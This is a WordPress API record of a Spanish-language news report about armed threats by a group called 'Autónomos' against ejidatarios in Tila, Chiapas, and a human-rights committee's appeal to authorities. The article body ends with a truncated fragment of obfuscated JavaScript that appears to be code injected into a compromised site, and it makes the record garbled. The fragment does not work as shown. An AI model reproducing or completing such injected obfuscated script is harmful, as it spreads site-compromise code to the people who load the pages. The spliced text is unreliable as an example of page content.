{"id":18190,"date":"2024-10-04T03:32:23","date_gmt":"2024-10-04T03:32:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18190"},"modified":"2024-10-04T03:32:24","modified_gmt":"2024-10-04T03:32:24","slug":"denuncian-amenazas-y-movilizacion-armada-en-tila-ejidatarios-acusan-al-grupo-paramilitar-autonomos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18190","title":{"rendered":"Denuncian amenazas y movilizaci\u00f3n armada en Tila: Ejidatarios acusan al grupo paramilitar &#8220;Aut\u00f3nomos&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241003-WA0020-1024x768.jpg\" alt=\"\" class=\"wp-image-18191\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241003-WA0020-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241003-WA0020-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241003-WA0020-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241003-WA0020.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Adri\u00e1n P\u00e9rez\/ Corresponsal<\/p>\n\n\n\n<p>3 de octubre del 2024. San Crist\u00f3bal de Las Casas.- El Comit\u00e9 de Derechos Humanos Digna Ochoa inform\u00f3 sobre la situaci\u00f3n de emergencia en el municipio de Tila, tras recibir una denuncia urgente por parte de ejidatarios de la regi\u00f3n. En la comunicaci\u00f3n, se se\u00f1ala la movilizaci\u00f3n armada de un grupo delincuencial autodenominado &#8220;Aut\u00f3nomos&#8221;, el cual ha emitido amenazas de muerte contra la poblaci\u00f3n y aquellos que no comparten su ideolog\u00eda.<\/p>\n\n\n\n<p>Seg\u00fan la denuncia, \u00e9ste grupo paramilitar, integrado por personas como Jos\u00e9 del Carmen, Gilberto Abram y Jos\u00e9 P\u00e9rez, ha desplegado fuerzas en los anexos de R\u00edo Grande, Chulum Chico, Sa\u00f1oja 1 y 2. Los &#8220;Aut\u00f3nomos&#8221; est\u00e1n organizados con armas de alto calibre, y sus acciones recientes incluyen la intimidaci\u00f3n a los pobladores, con un enfoque en aquellos que defienden la posesi\u00f3n de tierras. Asimismo, se menciona que planean actos de vandalismo en propiedades de avecindados y pobladores el 4 de octubre, y advierten sobre posibles intentos de expulsar a las autoridades militares y estatales presentes en el lugar.<\/p>\n\n\n\n<p>Los ejidatarios aseguran que este grupo paramilitar ha utilizado a ancianos, mujeres y ni\u00f1os como escudos en sus operaciones ilegales, mientras que los l\u00edderes se mantienen ocultos. Estos hechos, afirman, han ocurrido en el pasado, y la comunidad de Tila se encuentra en alerta m\u00e1xima para defender sus derechos y propiedades.<\/p>\n\n\n\n<p>&#8220;Hacemos responsable a este grupo paramilitar de lo que pueda suceder en las pr\u00f3ximas horas. Estamos en pie de lucha para proteger nuestro patrimonio. No permitiremos m\u00e1s violaciones a nuestros derechos&#8221;, expresaron en su denuncia.<\/p>\n\n\n\n<p>El Comit\u00e9 de Derechos Humanos Digna Ochoa hizo un llamado urgente a las autoridades competentes para que act\u00faen de manera inmediata y prevengan nuevos hechos de violencia en la zona.<\/p>\n\n\n\n<p>&#8220;Nunca m\u00e1s un pueblo sin nosotros&#8221;, concluye el comunicado de los ejidatarios, quienes reiteran su firmeza en la defensa de sus tierras y de la justicia social en la regi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Adri\u00e1n P\u00e9rez\/ Corresponsal 3 de octubre del 2024. San Crist\u00f3bal de Las Casas.- El Comit\u00e9 de Derechos Humanos Digna Ochoa inform\u00f3 sobre la situaci\u00f3n de emergencia en el municipio de Tila, tras recibir una denuncia urgente por parte de ejidatarios de la regi\u00f3n. En la comunicaci\u00f3n, se se\u00f1ala la movilizaci\u00f3n armada de un grupo delincuencial &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18191,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18190","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18190"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18190\/revisions"}],"predecessor-version":[{"id":18192,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18190\/revisions\/18192"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18191"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}